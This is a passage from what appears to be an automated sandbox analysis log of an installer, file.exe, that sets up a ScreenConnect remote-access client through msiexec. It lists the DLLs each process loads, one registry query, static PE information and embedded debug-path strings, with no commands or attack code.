                              Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: file.exeStatic PE information: certificate valid
                              Source: file.exeStatic file information: File size 5635656 > 1048576
                              Source: file.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2249568704.000000001B9E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: file.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: file.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: file.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: file.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3392174323.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250157916.000000001BD62000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250038149.000000001BD20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: file.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2185677970.0000000000B0D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: file.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2160635976.0000000004B50000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: file.exe, MSIE7CB.tmp.3.dr, MSIE7EB.tmp.3.dr, MSIEC9F.tmp.3.dr, setup.msi.0.dr, 5de52c.rbs.3.dr, 5de52d.msi.3.dr, 5de52b.msi.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: file.exe, MSIE114.tmp.2.dr, setup.msi.0.dr, 5de52d.msi.3.dr, 5de52b.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: file.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2249568704.000000001B9E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: file.exe
